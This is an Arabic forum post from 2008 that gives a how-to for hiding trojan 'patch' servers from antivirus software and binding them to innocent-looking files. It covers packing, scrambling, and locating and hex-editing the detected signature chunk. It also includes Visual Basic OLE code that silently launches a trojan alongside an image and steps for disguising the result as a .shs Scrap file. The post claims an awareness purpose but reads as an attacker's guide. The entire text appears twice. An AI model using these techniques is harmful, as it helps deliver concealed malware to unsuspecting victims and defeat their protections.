الرئيسية
من طرف admin الثلاثاء 11 نوفمبر 2008 - 3:00طرق دمج الباتش = التروجان
دمج التروجانات عن برامج الانتي فيروس:
يهدف الموضوع لتوعية مستخدمي الانترنت بالمخاطر التى قد تحيط بهم من جراء استقبال وفتح فيروس او باتش مشفر (لاتكتشفه برامج الانتي فيروس) وذلك باجهزتهم الشخصية أو شبكاتهم المحلية، فقد تعددت الاحاديث عن طريقة اخفاء الباتش عن برامج الانتي فيروس وذلك لازدياد الوعي من قبل مستخدمي الانترنت بضرورة تركيب وتحديث برامج الانتي فيروس مما يصعب من آلية الاختراق (الهاك).
وتلك الطرق تعتمد على تغيير في هيكل وتصميم الباتش بحيث يستمر فى اداء وظيفته مع اخفاؤه والفكرة الرئيسية فى ذلك هى معرفة آلية عمل برامج الانتي فيروس وكيفية الكشف عن مختلف انواع الانتي فيروس المعروف منها والجديد
فيما يلي بعض البرامح المتخصصة:
الطريقة الأولى stealth tools v2.00
يتميز بتعدد خدماته المتخصصة فى تشفير الباتش وهي كالتالي: binding – hex editing – VBS – split / join – add bytes – packing / scrambling
وفيما يلي ايضاح مختصر لاربعة بدائل مختلفة لكيفية استخدام البرنامج فى التشفير مع ملاحظة انه قبل استخدام اي من الطرق التالية يجب اختيار الباتش المراد تشفيره فى خانة اختيار الملف select file:
1- افضل واسهل الطرق واكثرها شيوعا وفاعلية هي packing / scrambling طريقة ضغط ثم تهيئة وتشفير الباتش حيث يتم التنفيذ بالترتيب packing scrambling –
2- استخدام خاصية الفصل والتجميع للباتش وذلك بتقسيم الباتش الى عدة اقسام split ثم الكشف باحد برامج الانتي فايروس على كل جزء ناتج فنجد ان جزء واحد فقط يكتشفه الانتي فايروس دليل علىاحتواء هذا الجزء على تعريف الفيروس، قم باخذ هذا الجزء وقم بالتعديل فيه بطريقة hex editing فى السداسي العشري له مع العلم بان التعديل المطلوب طفيف جدا ولاداعي للمبالغة حتى لايفسد الملف خواصه، احفظ الملف وقم بالتجميع مرة اخرى للباتش باستخدام join .
3- قم بتحويل الملف الى VBS هيئة الفيجوال بيسك (يعيب هذه الطريقة زيادة حجم الملف بمقدار 100 ك) ثم قم بربط الملف الناتج مع احد البرامج التنفيذية الطريفة joke عن طريق خاصية binding.
4- قم اولا بضغط الباتش packing ثم قم باضافة بايتات للملف الناتج باستخدام خاصية add new bytes مع مراعاة الا يزيد الحجم المضاف كثيرا عن القيمة الافتراضية بالبرنامج وهي 1 ك بعد ذلك قم بتهيئة الباتش بخاصية scrambling
&&&&&&&&&&&&&&&
دمج الباتش بالفيجوال بيزيك:
لدمج ملف الباتش مع صورة فقط تقيد بالخطوات التالية :
ولكن يلزمك برنامج فجوال بيسك الاصدار الخامس Microsoft Visual Basic 5.0 وليس السادس
والبرنامج عبارة عن ملفين صوره + باتش يعملان معا اذا قام بتشغيل الملف والصورة للتمويه
أول قم بتشغيل برنامج فجوال بيسك سوف تأتيك نافذة اختر منها Standard EXE ثم اختر OK
ثانيا اختر ادة OLE الموجودة في قائمة الادوات ثم حاول رسم مستطيل على نافذة المشروع
وبعد الانتهاء من رسم المربع سوف تظهر لك نافذة Insert Object اختر منها Create from File
ثم اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط على OK
ثالثا اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from File ثم Browse واختر الباتش
الذي تريده ثم اضغط OK
رابعا اضغط مرتين على نافذة المشروع حتى تأتيك صفحة الكود Code وأكتب هذا النص
()Private Sub Form_Load
OLE1.DoVerb
OLE2.DoVerb
End Sub
خامسا من قائمة File اختر Make Project1.exe سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته
مثلا اكتب EditServer
لقد انتهينا من دمج الباتش مع الصوره ولكن امتداده EXE وهذا الامتداد مشهور والكثير يخاف منهوالان سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف من قبل الكثير من مستخدمي الانترنت
والامتداد هو SHS وهذا الامتداد جدا خطير لما فيه من امكانيات الاتصال مع البرامج الاخرى وهو Scrap Object
والطريقه هي كالتالي :
اول قم بتشغيل برنامج WordPad اذا كنت ما تعرفه فهذا مكانه في الجهاز
C:\Program Files\Accessories\WORDPAD.EXE
افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف الباتش + الصورة حاول تنسق النوافذ
والان اضغط على البرنامج EditServer بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad
سوف ينتقل الملف الى البرنامج بكل سهوله
ثانيا اضغط بالزر الايمن على الملف الذي انتقل الى WordPad اختر Package Object ثم Edit Package
سوف تظهر لك نافذه بأسم Object Packager - Package in Document اختر قائمة Edit ثم Copy Package
ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار الايمن ثم اختر Paste (لصق)
سوف يتكون لك ملف شكله غريب باسم Scrap وهذا هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل كلك سوف تظهر لك صوره
وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره
والآن قد حصلت على باتش مرفق بصوره
اخواني . من قال لكم الفجول بيسك 5 فقط !!!!!... تستطيع عمل في الاصدار 6 وغيره ..
فقط اضف هذا السطر الى الكود me.hide
ليصبح بهذا الشكل
()Private Sub Form_Load
OLE1.DoVerb
OLE2.DoVerb
me.hide ' تـقوم باخفاء الفورم
دمج التروجانات عن برامج الانتي فيروس:
يهدف الموضوع لتوعية مستخدمي الانترنت بالمخاطر التى قد تحيط بهم من جراء استقبال وفتح فيروس او باتش مشفر (لاتكتشفه برامج الانتي فيروس) وذلك باجهزتهم الشخصية أو شبكاتهم المحلية، فقد تعددت الاحاديث عن طريقة اخفاء الباتش عن برامج الانتي فيروس وذلك لازدياد الوعي من قبل مستخدمي الانترنت بضرورة تركيب وتحديث برامج الانتي فيروس مما يصعب من آلية الاختراق (الهاك).
وتلك الطرق تعتمد على تغيير في هيكل وتصميم الباتش بحيث يستمر فى اداء وظيفته مع اخفاؤه والفكرة الرئيسية فى ذلك هى معرفة آلية عمل برامج الانتي فيروس وكيفية الكشف عن مختلف انواع الانتي فيروس المعروف منها والجديد
فيما يلي بعض البرامح المتخصصة:
الطريقة الأولى stealth tools v2.00
يتميز بتعدد خدماته المتخصصة فى تشفير الباتش وهي كالتالي: binding – hex editing – VBS – split / join – add bytes – packing / scrambling
وفيما يلي ايضاح مختصر لاربعة بدائل مختلفة لكيفية استخدام البرنامج فى التشفير مع ملاحظة انه قبل استخدام اي من الطرق التالية يجب اختيار الباتش المراد تشفيره فى خانة اختيار الملف select file:
1- افضل واسهل الطرق واكثرها شيوعا وفاعلية هي packing / scrambling طريقة ضغط ثم تهيئة وتشفير الباتش حيث يتم التنفيذ بالترتيب packing scrambling –
2- استخدام خاصية الفصل والتجميع للباتش وذلك بتقسيم الباتش الى عدة اقسام split ثم الكشف باحد برامج الانتي فايروس على كل جزء ناتج فنجد ان جزء واحد فقط يكتشفه الانتي فايروس دليل علىاحتواء هذا الجزء على تعريف الفيروس، قم باخذ هذا الجزء وقم بالتعديل فيه بطريقة hex editing فى السداسي العشري له مع العلم بان التعديل المطلوب طفيف جدا ولاداعي للمبالغة حتى لايفسد الملف خواصه، احفظ الملف وقم بالتجميع مرة اخرى للباتش باستخدام join .
3- قم بتحويل الملف الى VBS هيئة الفيجوال بيسك (يعيب هذه الطريقة زيادة حجم الملف بمقدار 100 ك) ثم قم بربط الملف الناتج مع احد البرامج التنفيذية الطريفة joke عن طريق خاصية binding.
4- قم اولا بضغط الباتش packing ثم قم باضافة بايتات للملف الناتج باستخدام خاصية add new bytes مع مراعاة الا يزيد الحجم المضاف كثيرا عن القيمة الافتراضية بالبرنامج وهي 1 ك بعد ذلك قم بتهيئة الباتش بخاصية scrambling
&&&&&&&&&&&&&&&
دمج الباتش بالفيجوال بيزيك:
لدمج ملف الباتش مع صورة فقط تقيد بالخطوات التالية :
ولكن يلزمك برنامج فجوال بيسك الاصدار الخامس Microsoft Visual Basic 5.0 وليس السادس
والبرنامج عبارة عن ملفين صوره + باتش يعملان معا اذا قام بتشغيل الملف والصورة للتمويه
أول قم بتشغيل برنامج فجوال بيسك سوف تأتيك نافذة اختر منها Standard EXE ثم اختر OK
ثانيا اختر ادة OLE الموجودة في قائمة الادوات ثم حاول رسم مستطيل على نافذة المشروع
وبعد الانتهاء من رسم المربع سوف تظهر لك نافذة Insert Object اختر منها Create from File
ثم اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط على OK
ثالثا اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from File ثم Browse واختر الباتش
الذي تريده ثم اضغط OK
رابعا اضغط مرتين على نافذة المشروع حتى تأتيك صفحة الكود Code وأكتب هذا النص
()Private Sub Form_Load
OLE1.DoVerb
OLE2.DoVerb
End Sub
خامسا من قائمة File اختر Make Project1.exe سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته
مثلا اكتب EditServer
لقد انتهينا من دمج الباتش مع الصوره ولكن امتداده EXE وهذا الامتداد مشهور والكثير يخاف منهوالان سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف من قبل الكثير من مستخدمي الانترنت
والامتداد هو SHS وهذا الامتداد جدا خطير لما فيه من امكانيات الاتصال مع البرامج الاخرى وهو Scrap Object
والطريقه هي كالتالي :
اول قم بتشغيل برنامج WordPad اذا كنت ما تعرفه فهذا مكانه في الجهاز
C:\Program Files\Accessories\WORDPAD.EXE
افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف الباتش + الصورة حاول تنسق النوافذ
والان اضغط على البرنامج EditServer بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad
سوف ينتقل الملف الى البرنامج بكل سهوله
ثانيا اضغط بالزر الايمن على الملف الذي انتقل الى WordPad اختر Package Object ثم Edit Package
سوف تظهر لك نافذه بأسم Object Packager - Package in Document اختر قائمة Edit ثم Copy Package
ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار الايمن ثم اختر Paste (لصق)
سوف يتكون لك ملف شكله غريب باسم Scrap وهذا هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل كلك سوف تظهر لك صوره
وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره
والآن قد حصلت على باتش مرفق بصوره
اخواني . من قال لكم الفجول بيسك 5 فقط !!!!!... تستطيع عمل في الاصدار 6 وغيره ..
فقط اضف هذا السطر الى الكود me.hide
ليصبح بهذا الشكل
()Private Sub Form_Load
OLE1.DoVerb
OLE2.DoVerb
me.hide ' تـقوم باخفاء الفورم
